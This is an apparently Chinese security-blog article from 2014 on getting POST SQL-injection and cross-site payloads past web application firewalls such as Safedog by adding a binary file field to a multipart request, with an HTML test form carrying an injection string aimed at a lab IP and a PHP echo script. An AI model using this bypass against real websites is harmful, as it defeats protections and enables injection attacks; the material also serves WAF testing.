热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

轻松绕各种WAF的POST注入、跨站防御(安全狗)

发布时间:2014-04-03 15:06文章来源:网络文章作者:园长 点击次数:
摘要:XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压...

XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。

构建如下HTML表单:

  1. <!DOCTYPE html> 
  2. <html> 
  3. <head> 
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> 
  5. <title>yzmm - p2j.cn</title> 
  6. </head> 
  7. <body> 
  8. <form action="http://192.168.199.151/index.php" method="POST" enctype="multipart/form-data"> 
  9. File:<input type="file" name="file" /><br/> 
  10. ID:<input type="text" name="id" value="select 1 from mysql.user--" style="width:250px;" / ><br/> 
  11. <input type="submit" value="提交" /> 
  12. </form> 
  13. </body> 
  14. </html> 

index.php:

  1. <?php 
  2. echo "POST-ID:".$_POST['id']."<br/>GET-ID:".$_GET['id']; 
  3. ?> 

提交如下请求:

 

轻松绕各种WAF的POST注入、跨站防御

提交带二进制文件的请求:

 

轻松绕各种WAF的POST注入、跨站防御

成功绕过。

标签分类:

上一篇:DedeCMS最新通杀注入(buy_action.php)漏洞分析
下一篇:header头referer字段反射xss利用